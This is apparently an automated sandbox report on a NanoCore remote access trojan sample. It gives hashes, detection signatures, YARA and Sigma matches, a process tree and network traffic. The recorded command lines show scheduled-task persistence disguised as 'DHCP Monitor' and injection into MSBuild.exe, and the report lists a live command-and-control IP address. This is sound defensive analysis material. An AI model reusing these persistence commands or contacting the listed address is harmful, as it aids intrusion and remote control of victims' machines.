Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Trojan.DownLoader36.7233.23906.21829

Overview

General Information

Sample Name:	SecuriteInfo.com.Trojan.DownLoader36.7233.23906.21829 (renamed file extension from 21829 to exe)
Analysis ID:	324206
MD5:	ee4555ac614048e36aae067b6a032951
SHA1:	c7559fe7c094d4643ea3ab09c071fa0ac8ec18a4
SHA256:	3a2278374596d368ec773c10d54ec91f69445144248769abb155de58215d8c2c
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected Nanocore Rat

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: NanoCore

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Nanocore RAT

Connects to many ports of the same IP (likely port scanning)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe (PID: 2440 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe' MD5: EE4555AC614048E36AAE067B6A032951)

conhost.exe (PID: 5092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5316 cmdline: cmd /c schtasks /Create /TN images /XML 'C:\Users\user\AppData\Local\Temp\27c398b5630447af830b2dd2bc343446.xml' MD5: F3BDBE3BB6F734E357235F4D5898582D)

schtasks.exe (PID: 4928 cmdline: schtasks /Create /TN images /XML 'C:\Users\user\AppData\Local\Temp\27c398b5630447af830b2dd2bc343446.xml' MD5: 15FF7D8324231381BAD48A052F85DF04)

MSBuild.exe (PID: 2152 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe MD5: 88BBB7610152B48C2B3879473B17857E)

schtasks.exe (PID: 5920 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp182E.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 2168 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp1B1D.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 4120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

MSBuild.exe (PID: 5292 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0 MD5: 88BBB7610152B48C2B3879473B17857E)

conhost.exe (PID: 1968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

dhcpmon.exe (PID: 5972 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 88BBB7610152B48C2B3879473B17857E)

conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

dhcpmon.exe (PID: 5588 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 88BBB7610152B48C2B3879473B17857E)

conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x15bdd:$x1: NanoCore.ClientPluginHost 0x15c1a:$x2: IClientNetworkHost 0x1974d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x15945:$a: NanoCore 0x15955:$a: NanoCore 0x15b89:$a: NanoCore 0x15b9d:$a: NanoCore 0x15bdd:$a: NanoCore 0x159a4:$b: ClientPlugin 0x15ba6:$b: ClientPlugin 0x15be6:$b: ClientPlugin 0x15acb:$c: ProjectData 0x164d2:$d: DESCrypto 0x1de9e:$e: KeepAlive 0x1be8c:$g: LogClientMessage 0x18087:$i: get_Connected 0x16808:$j: #=q 0x16838:$j: #=q 0x16854:$j: #=q 0x16884:$j: #=q 0x168a0:$j: #=q 0x168bc:$j: #=q 0x168ec:$j: #=q 0x16908:$j: #=q
00000003.00000003.228783921.0000000004481000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1312:$a: NanoCore 0x1337:$a: NanoCore 0x1390:$a: NanoCore 0x1152d:$a: NanoCore 0x11553:$a: NanoCore 0x115af:$a: NanoCore 0x1e404:$a: NanoCore 0x1e45d:$a: NanoCore 0x1e490:$a: NanoCore 0x1e6bc:$a: NanoCore 0x1e738:$a: NanoCore 0x1ed51:$a: NanoCore 0x1ee9a:$a: NanoCore 0x1f36e:$a: NanoCore 0x1f655:$a: NanoCore 0x1f66c:$a: NanoCore 0x229f5:$a: NanoCore 0x23daf:$a: NanoCore 0x23df9:$a: NanoCore 0x24a53:$a: NanoCore 0x2a038:$a: NanoCore
Process Memory Space: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe PID: 2440	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10df52:$x1: NanoCore.ClientPluginHost 0x10dfb3:$x2: IClientNetworkHost 0x1133b8:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x12132a:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe PID: 2440	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe PID: 2440	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10da57:$a: NanoCore 0x10da73:$a: NanoCore 0x10dbce:$a: NanoCore 0x10dbdd:$a: NanoCore 0x10deb6:$a: NanoCore 0x10dee2:$a: NanoCore 0x10df52:$a: NanoCore 0x11d994:$a: NanoCore 0x11d9a6:$a: NanoCore 0x11d9e2:$a: NanoCore 0x10dafe:$b: ClientPlugin 0x10dc27:$b: ClientPlugin 0x10deeb:$b: ClientPlugin 0x10df5b:$b: ClientPlugin 0x11d9af:$b: ClientPlugin 0x11d9eb:$b: ClientPlugin 0x10dd74:$c: ProjectData 0x11d8e1:$c: ProjectData 0x10eeb0:$d: DESCrypto 0x11e23f:$d: DESCrypto 0x11923d:$e: KeepAlive
Process Memory Space: MSBuild.exe PID: 2152	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b547:$a: NanoCore 0x8b56c:$a: NanoCore 0x8f39c:$a: NanoCore 0x8f3c1:$a: NanoCore 0xecb3c:$a: NanoCore 0xecb61:$a: NanoCore 0x20515c:$a: NanoCore 0x205199:$a: NanoCore 0x205222:$a: NanoCore 0x20a5ba:$a: NanoCore 0x20a5dd:$a: NanoCore 0x20a632:$a: NanoCore 0x20fa75:$a: NanoCore 0x20fab3:$a: NanoCore 0x20fb3f:$a: NanoCore 0x21a4dc:$a: NanoCore 0x21a500:$a: NanoCore 0x21a558:$a: NanoCore 0x222174:$a: NanoCore 0x222215:$a: NanoCore 0x222278:$a: NanoCore
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe.320000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1e5dd:$x1: NanoCore.ClientPluginHost 0x1e61a:$x2: IClientNetworkHost 0x2214d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe.320000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1e355:$x1: NanoCore Client.exe 0x1e5dd:$x2: NanoCore.ClientPluginHost 0x1fc16:$s1: PluginCommand 0x1fc0a:$s2: FileCommand 0x20abb:$s3: PipeExists 0x26872:$s4: PipeCreated 0x1e607:$s5: IClientLoggingHost
0.2.SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe.320000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe.320000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1e345:$a: NanoCore 0x1e355:$a: NanoCore 0x1e589:$a: NanoCore 0x1e59d:$a: NanoCore 0x1e5dd:$a: NanoCore 0x1e3a4:$b: ClientPlugin 0x1e5a6:$b: ClientPlugin 0x1e5e6:$b: ClientPlugin 0x1e4cb:$c: ProjectData 0x1eed2:$d: DESCrypto 0x2689e:$e: KeepAlive 0x2488c:$g: LogClientMessage 0x20a87:$i: get_Connected 0x1f208:$j: #=q 0x1f238:$j: #=q 0x1f254:$j: #=q 0x1f284:$j: #=q 0x1f2a0:$j: #=q 0x1f2bc:$j: #=q 0x1f2ec:$j: #=q 0x1f308:$j: #=q

Sigma Overview

System Summary:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ProcessId: 2152, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp182E.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp182E.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ParentProcessId: 2152, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp182E.tmp', ProcessId: 5920

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

Avira: detected

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Temp\images.exe

Avira: detection malicious, Label: TR/ATRAPS.Gen

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Temp\images.exe

ReversingLabs: Detection: 79%

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Metadefender: Detection: 21%			Perma Link
Source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	ReversingLabs: Detection: 75%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe PID: 2440, type: MEMORY
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe.320000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Temp\images.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

Joe Sandbox ML: detected

Source: 0.2.SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe.320000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 0.0.SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe.320000.0.unpack	Avira: Label: TR/ATRAPS.Gen

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49723 -> 209.159.151.5:24980

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic

TCP traffic: 209.159.151.5 ports 0,2,4,24980,8,9

Source: global traffic

TCP traffic: 192.168.2.3:49723 -> 209.159.151.5:24980

Source: Joe Sandbox View

ASN Name: IS-AS-1US IS-AS-1US

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5
Source: unknown	TCP traffic detected without corresponding DNS query: 209.159.151.5

Source: MSBuild.exe, 00000003.00000003.228783921.0000000004481000.00000004.00000001.sdmp

String found in binary or memory: http://google.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49679

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe PID: 2440, type: MEMORY
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe.320000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000003.228783921.0000000004481000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe PID: 2440, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe PID: 2440, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MSBuild.exe PID: 2152, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe.320000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe.320000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

Code function: 0_2_00321090 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetConsoleWindow,ShowWindow,LoadLibraryA,RpcMgmtEpEltInqBegin,NtCreateSection,NtMapViewOfSection,CloseHandle,CallWindowProcW,

0_2_00321090

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Code function: 0_2_00324D98	0_2_00324D98
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 9_2_05190708	9_2_05190708
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 11_2_00F20708	11_2_00F20708
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 14_2_00896D08	14_2_00896D08
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 14_2_00896950	14_2_00896950
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 14_2_0089692F	14_2_0089692F
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 14_2_05050708	14_2_05050708

Source: dhcpmon.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dhcpmon.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dhcpmon.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe, 00000000.00000003.217098916.0000000002ABF000.00000004.00000001.sdmp

Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

Source: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000003.228783921.0000000004481000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe PID: 2440, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe PID: 2440, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: MSBuild.exe PID: 2152, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe.320000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe.320000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe.320000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: dhcpmon.exe, 0000000E.00000002.250115588.0000000002E41000.00000004.00000001.sdmp	Binary or memory string: kr)C:\Program Files (x86)\DHCP Monitor\.sln
Source: dhcpmon.exe, 0000000B.00000000.225859011.00000000004C2000.00000002.00020000.sdmp, dhcpmon.exe, 0000000E.00000002.249042696.0000000000892000.00000002.00020000.sdmp, dhcpmon.exe.3.dr	Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: dhcpmon.exe, 0000000B.00000000.225859011.00000000004C2000.00000002.00020000.sdmp, dhcpmon.exe, 0000000E.00000002.249042696.0000000000892000.00000002.00020000.sdmp, dhcpmon.exe.3.dr	Binary or memory string: MSBuild MyApp.csproj /t:Clean /p:Configuration=Debug
Source: dhcpmon.exe, 0000000B.00000000.225859011.00000000004C2000.00000002.00020000.sdmp, dhcpmon.exe, 0000000E.00000002.249042696.0000000000892000.00000002.00020000.sdmp, dhcpmon.exe.3.dr	Binary or memory string: *.sln+AmbiguousProjectError'MissingProjectError)ProjectNotFoundError)InvalidPropertyError
Source: dhcpmon.exe	Binary or memory string: *.sln

Source: classification engine

Classification label: mal100.troj.evad.winEXE@20/15@0/1

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5948:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1968:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5092:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{8127ccf6-0246-44cc-81bf-cfc57c0704b0}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5860:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4120:120:WilError_01

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

File created: C:\Users\user\AppData\Local\Temp\Temp

Jump to behavior

Source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
